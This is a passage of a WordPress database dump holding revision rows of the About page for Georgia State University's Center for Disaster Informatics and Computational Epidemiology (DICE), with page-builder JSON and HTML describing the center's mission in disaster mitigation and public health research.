Planning<\\/p>\"}}],\"id\":\"122-c7\",\"parentId\":\"122-c6\",\"partialId\":122,\"styleRef\":318,\"type\":\"content\"}],\"parentId\":\"122-c2\",\"index\":0,\"id\":\"122-c6\",\"partialId\":122,\"styleRef\":317,\"type\":\"content\"}],\"id\":\"122-c2\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":314,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c11\",\"parentId\":\"122-c10\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c11\",\"index\":0,\"id\":\"122-c12\",\"partialId\":122,\"styleRef\":288,\"type\":\"content\",\"props\":{\"content\":\"Who are we?\"}},{\"name\":\"hop-heading\",\"parentId\":\"122-c11\",\"index\":1,\"id\":\"122-c13\",\"partialId\":122,\"styleRef\":289,\"type\":\"content\",\"props\":{\"content\":\"The Center for Disaster Informatics &amp; Computational Epidemiology (DICE) at Georgia State University\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c11\",\"index\":2,\"id\":\"122-c14\",\"partialId\":122,\"styleRef\":290,\"type\":\"content\",\"props\":{\"content\":\"<p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit partners; and local communities. <\\/p>\"}}],\"styleRef\":287,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c15\",\"parentId\":\"122-c10\",\"partialId\":122,\"styleRef\":291,\"type\":\"content\"}],\"id\":\"122-c10\",\"parentId\":\"122-c9\",\"partialId\":122,\"styleRef\":286,\"type\":\"content\"}],\"id\":\"122-c9\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":285,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c18\",\"parentId\":\"122-c17\",\"partialId\":122,\"styleRef\":294,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c19\",\"parentId\":\"122-c17\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c19\",\"index\":0,\"id\":\"122-c20\",\"partialId\":122,\"styleRef\":296,\"type\":\"content\",\"props\":{\"content\":\"What do we do?\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c19\",\"index\":2,\"id\":\"122-c21\",\"partialId\":122,\"styleRef\":298,\"type\":\"content\",\"props\":{\"content\":\"<p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners<\\/p>\"}}],\"styleRef\":295,\"type\":\"content\"}],\"id\":\"122-c17\",\"parentId\":\"122-c16\",\"partialId\":122,\"styleRef\":293,\"type\":\"content\"}],\"id\":\"122-c16\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":292,\"type\":\"content\"}],\"id\":\"122-c1\",\"partialId\":122,\"styleRef\":280,\"type\":\"content\"}','','','inherit','closed','closed','','353-revision-v1','','','2022-03-31 23:40:07','2022-04-01 03:40:07','',353,'https://gsudice.dataconn.net/?p=935',0,'revision','',0),(936,1,'2022-03-31 23:40:07','2022-04-01 03:40:07','<div data-colibri-id=\"122-c1\" class=\"style-280 style-local-122-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"122-c2\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-314 style-local-122-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"122-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-321 style-local-122-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-322-outer style-local-122-c4-outer\">\n            <div data-colibri-id=\"122-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-322 style-local-122-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c5\" class=\"h-global-transition-all h-heading style-324 style-local-122-c5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-324 style-local-122-c5\">\n                    <!---->\n                    <!---->\n                    <h3 class=\"\">Our Mission</h3>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"122-c6\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-317 style-local-122-c6 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-center align-items-md-center align-items-center gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto align-self-lg-center align-self-md-center align-self-center style-318-outer style-local-122-c7-outer\">\n            <div data-colibri-id=\"122-c7\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-318 style-local-122-c7 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c8\" class=\"h-text h-text-component style-319 style-local-122-c8 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research\n                      to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"122-c9\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-285 style-local-122-c9 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"122-c10\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-286 style-local-122-c10 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-287-outer style-local-122-c11-outer\">\n            <div data-colibri-id=\"122-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-287 style-local-122-c11 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c12\" class=\"h-global-transition-all h-heading style-288 style-local-122-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-288 style-local-122-c12\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Who are we?</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c13\" class=\"h-global-transition-all h-heading style-289 style-local-122-c13 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-289 style-local-122-c13\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">The Center for Disaster Informatics &amp; Computational Epidemiology (DICE) at Georgia State University</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c14\" class=\"h-text h-text-component style-290 style-local-122-c14 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research\n                      that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit\n                      partners; and local communities. </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-291-outer style-local-122-c15-outer\">\n            <div data-colibri-id=\"122-c15\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-291 style-local-122-c15 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"122-c16\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-292 style-local-122-c16 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"122-c17\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-293 style-local-122-c17 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-294-outer style-local-122-c18-outer\">\n            <div data-colibri-id=\"122-c18\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-294 style-local-122-c18 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-295-outer style-local-122-c19-outer\">\n            <div data-colibri-id=\"122-c19\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-295 style-local-122-c19 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c20\" class=\"h-global-transition-all h-heading style-296 style-local-122-c20 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-296 style-local-122-c20\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">What do we do?</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c21\" class=\"h-text h-text-component style-298 style-local-122-c21 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities\n                      that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate\n                      these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','About','','inherit','closed','closed','','122-revision-v1','','','2022-03-31 23:40:07','2022-04-01 03:40:07','',122,'https://gsudice.dataconn.net/?p=936',0,'revision','',0),(944,1,'2022-04-08 11:39:15','2022-04-08 15:39:15','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c11\",\"parentId\":\"122-c10\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c11\",\"index\":0,\"id\":\"122-c12\",\"partialId\":122,\"styleRef\":288,\"type\":\"content\",\"props\":{\"content\":\"Who are we?\"}},{\"name\":\"hop-heading\",\"parentId\":\"122-c11\",\"index\":1,\"id\":\"122-c13\",\"partialId\":122,\"styleRef\":289,\"type\":\"content\",\"props\":{\"content\":\"The Center for Disaster Informatics &amp; Computational Epidemiology (DICE) at Georgia State University\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c11\",\"index\":2,\"id\":\"122-c14\",\"partialId\":122,\"styleRef\":290,\"type\":\"content\",\"props\":{\"content\":\"<p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit partners; and local communities. <\\/p>\"}}],\"styleRef\":287,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c15\",\"parentId\":\"122-c10\",\"partialId\":122,\"styleRef\":291,\"type\":\"content\"}],\"id\":\"122-c10\",\"parentId\":\"122-c9\",\"partialId\":122,\"styleRef\":286,\"type\":\"content\"}],\"id\":\"122-c9\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":285,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Custom\",\"attrs\":{\"id\":\"custom\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c4\",\"parentId\":\"122-c3\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"122-c4\",\"index\":0,\"id\":\"122-c5\",\"partialId\":122,\"styleRef\":324,\"type\":\"content\",\"props\":{\"content\":\"Our Mission\"}}],\"styleRef\":322,\"type\":\"content\"}],\"id\":\"122-c3\",\"parentId\":\"122-c2\",\"partialId\":122,\"styleRef\":321,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"100\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"id\":\"122-c8\",\"parentId\":\"122-c7\",\"partialId\":122,\"styleRef\":319,\"type\":\"content\",\"props\":{\"content\":\"<p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning<\\/p>\"}}],\"id\":\"122-c7\",\"parentId\":\"122-c6\",\"partialId\":122,\"styleRef\":318,\"type\":\"content\"}],\"parentId\":\"122-c2\",\"index\":0,\"id\":\"122-c6\",\"partialId\":122,\"styleRef\":317,\"type\":\"content\"}],\"id\":\"122-c2\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":314,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c18\",\"parentId\":\"122-c17\",\"partialId\":122,\"styleRef\":294,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c19\",\"parentId\":\"122-c17\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c19\",\"index\":0,\"id\":\"122-c20\",\"partialId\":122,\"styleRef\":296,\"type\":\"content\",\"props\":{\"content\":\"What do we do?\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c19\",\"index\":2,\"id\":\"122-c21\",\"partialId\":122,\"styleRef\":298,\"type\":\"content\",\"props\":{\"content\":\"<p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners<\\/p>\"}}],\"styleRef\":295,\"type\":\"content\"}],\"id\":\"122-c17\",\"parentId\":\"122-c16\",\"partialId\":122,\"styleRef\":293,\"type\":\"content\"}],\"id\":\"122-c16\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":292,\"type\":\"content\"}],\"id\":\"122-c1\",\"partialId\":122,\"styleRef\":280,\"type\":\"content\"}','','','inherit','closed','closed','','353-revision-v1','','','2022-04-08 11:39:15','2022-04-08 15:39:15','',353,'https://gsudice.dataconn.net/?p=944',0,'revision','',0),(945,1,'2022-04-08 11:39:15','2022-04-08 15:39:15','<div data-colibri-id=\"122-c1\" class=\"style-280 style-local-122-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"122-c9\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-285 style-local-122-c9 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"122-c10\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-286 style-local-122-c10 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-287-outer style-local-122-c11-outer\">\n            <div data-colibri-id=\"122-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-287 style-local-122-c11 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c12\" class=\"h-global-transition-all h-heading style-288 style-local-122-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-288 style-local-122-c12\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Who are we?</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c13\" class=\"h-global-transition-all h-heading style-289 style-local-122-c13 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-289 style-local-122-c13\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">The Center for Disaster Informatics &amp; Computational Epidemiology (DICE) at Georgia State University</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c14\" class=\"h-text h-text-component style-290 style-local-122-c14 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research\n                      that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit\n                      partners; and local communities. </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-291-outer style-local-122-c15-outer\">\n            <div data-colibri-id=\"122-c15\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-291 style-local-122-c15 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"122-c2\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-314 style-local-122-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"122-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-321 style-local-122-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-322-outer style-local-122-c4-outer\">\n            <div data-colibri-id=\"122-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-322 style-local-122-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c5\" class=\"h-global-transition-all h-heading style-324 style-local-122-c5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-324 style-local-122-c5\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Our Mission</h4>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"122-c6\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-317 style-local-122-c6 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-center align-items-md-center align-items-center gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto align-self-lg-center align-self-md-center align-self-center style-318-outer style-local-122-c7-outer\">\n            <div data-colibri-id=\"122-c7\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-318 style-local-122-c7 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c8\" class=\"h-text h-text-component style-319 style-local-122-c8 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research\n                      to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"122-c16\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-292 style-local-122-c16 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"122-c17\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-293 style-local-122-c17 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-294-outer style-local-122-c18-outer\">\n            <div data-colibri-id=\"122-c18\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-294 style-local-122-c18 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-295-outer style-local-122-c19-outer\">\n            <div data-colibri-id=\"122-c19\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-295 style-local-122-c19 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c20\" class=\"h-global-transition-all h-heading style-296 style-local-122-c20 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-296 style-local-122-c20\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">What do we do?</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c21\" class=\"h-text h-text-component style-298 style-local-122-c21 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities\n                      that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate\n                      these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','About','','inherit','closed','closed','','122-revision-v1','','','2022-04-08 11:39:15','2022-04-08 15:39:15','',122,'https://gsudice.dataconn.net/?p=945',0,'revision','',0),(958,1,'2022-04-08 11:45:31','2022-04-08 